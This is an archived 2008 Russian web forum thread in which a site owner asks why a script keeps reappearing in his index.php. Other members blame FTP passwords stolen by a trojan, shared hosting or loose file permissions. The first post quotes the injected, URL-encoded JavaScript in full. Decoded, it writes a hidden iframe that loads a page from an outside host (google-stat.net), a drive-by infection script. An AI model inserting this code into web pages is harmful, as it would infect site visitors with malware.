Главная страница
    Top.Mail.Ru    Яндекс.Метрика
Форум: "Прочее";
Текущий архив: 2008.10.26;
Скачать: [xml.tar.bz2];

Вниз

Вирус на index.php :((   Найти похожие ветки 

 
Урсулапов   (2008-09-02 16:18) [0]

На скрипте не было, но периодически появляется.
<script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%37%32%38%63%31%65%66%34%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2d%73%74%61%74%2e%6e%65%74%2f%73%74%61%74%2f%73%74%61%74%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%31%37%38%31%32%30%29%2b%27%63%32%61%37%61%64%66%65%65%62%61%5c%27%20%77%69%64%74%68%3d%35%38%34%20%68%65%69%67%68%74%3d%33%30%35%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29")); </script>
Когда открываешь сайт, Касперский бьет тревогу. А этот код на index.php записан. Удалил, через неделю опять замечаю. Пароль от хостинга менял несколько раз - не помогает :(((


 
antonn ©   (2008-09-02 16:21) [1]

трепи хостера.
пароль не храни.


 
McSimm ©   (2008-09-02 16:21) [2]

Вероятно соседи по хостингу, такое бывает, если плохо настроено разделение доступа.

Менять хостинг.


 
Eraser ©   (2008-09-02 16:32) [3]

> [0] Урсулапов   (02.09.08 16:18)

хостинг скорее всего не причем, это очень распространенное явление. либо методом подбора фтп ломанули, либо троян с тоталкомандера выкрал пароли.


 
Eraser ©   (2008-09-02 16:33) [4]

> [2] McSimm ©   (02.09.08 16:21)


> Менять хостинг.

не стоит.
в бытность работы в веб-студиях чуть ли не каждый день клиенты звонили с такими жалобами. хостинг не при чем.


 
ketmar ©   (2008-09-02 20:44) [5]

не надо пользовать тоталкомандер. вообще не надо нигде пароль сохранять. или терпи, раз гигиену не соблюдаешь.

зыж допускаю, что это хостер виновен, но с вероятностью 0.00001%.

---
Do what thou wilt shall be the whole of the Law.


 
Anatoly Podgoretsky ©   (2008-09-02 21:22) [6]

Это причина переходить на Висту, пароли там вводятся в отдельном десктопе без возможности перехвата.


 
blackman ©   (2008-09-02 21:32) [7]

Anatoly Podgoretsky ©   (02.09.08 21:22) [6]
Это не причина. Виста ломается так же легко как ХР :)
Проверять надо на троянчики, следить...


 
Anatoly Podgoretsky ©   (2008-09-02 21:52) [8]

Я к тому, что безопасность там выше, в том числе и по вводу паролей системой. Десктоп это объект безопасности Виндоус и тут его по полной использовали. Против тоталкомандера и запоминание пароля в нем, не спасет конечно. Поскольку причина тоталкомандер.


 
blackman ©   (2008-09-02 22:00) [9]

Против тоталкомандера и запоминание пароля в нем, не спасет конечно.
Смотря какую версию пользовать


 
Anatoly Podgoretsky ©   (2008-09-02 22:04) [10]

А что есть нормальные и безопасные, работающие в том числе и на Висте? Ведь он пишется на Д2


 
radium ©   (2008-09-02 22:50) [11]

А у файла index.php какие права, не 777 (в случае UNIX-хостинга)?

Хотя скорее всего проблема действительно в наличие трояна на вашем компе.

P.S.
Avast! меня даже страницу этого треда не пускал - вопил про наличие JS:Agent-AV [Trj]

;-)


 
ketmar ©   (2008-09-02 23:28) [12]

>[11] radium © (2008-09-02 22:50:00)
потому что аваст тупой, не отличает текст от скриптов.

---
Do what thou wilt shall be the whole of the Law.


 
Anatoly Podgoretsky ©   (2008-09-02 23:35) [13]

Попсовый антивирус

http://delphimaster.net/view/15-1220362249/


 
blackman ©   (2008-09-03 10:10) [14]

Anatoly Podgoretsky ©   (02.09.08 22:04) [10]
Что значит нормальные? Он и так нормальный, а защиту FTP автор давно обещал улучшить и вероятно сделал это.
Но кроме того есть ряд возможностей по доп.защите которые можно реализовать и самому, немного подумав.
D3 кажется.
Но конечно лучше всего пароли нигде не запоминать поскольку ВСЕ защиты взламываются.



Страницы: 1 вся ветка

Форум: "Прочее";
Текущий архив: 2008.10.26;
Скачать: [xml.tar.bz2];

Наверх




Память: 0.5 MB
Время: 0.005 c
11-1194649488
Эдик
2007-11-10 02:04
2008.10.26
Модули для работы с файлами 3D Studio Max.


2-1221686355
DBGrid
2008-09-18 01:19
2008.10.26
Убрать ScrollBar


15-1220362249
palva
2008-09-02 17:30
2008.10.26
Эту ветку даже открыть не могу


9-1174567977
Maximillian
2007-03-22 15:52
2008.10.26
Делаю игру, нужна помощь по скроллингу


15-1220504333
quake
2008-09-04 08:58
2008.10.26
Создание карт





Afrikaans Albanian Arabic Armenian Azerbaijani Basque Belarusian Bulgarian Catalan Chinese (Simplified) Chinese (Traditional) Croatian Czech Danish Dutch English Estonian Filipino Finnish French
Galician Georgian German Greek Haitian Creole Hebrew Hindi Hungarian Icelandic Indonesian Irish Italian Japanese Korean Latvian Lithuanian Macedonian Malay Maltese Norwegian
Persian Polish Portuguese Romanian Russian Serbian Slovak Slovenian Spanish Swahili Swedish Thai Turkish Ukrainian Urdu Vietnamese Welsh Yiddish Bengali Bosnian
Cebuano Esperanto Gujarati Hausa Hmong Igbo Javanese Kannada Khmer Lao Latin Maori Marathi Mongolian Nepali Punjabi Somali Tamil Telugu Yoruba
Zulu
Английский Французский Немецкий Итальянский Португальский Русский Испанский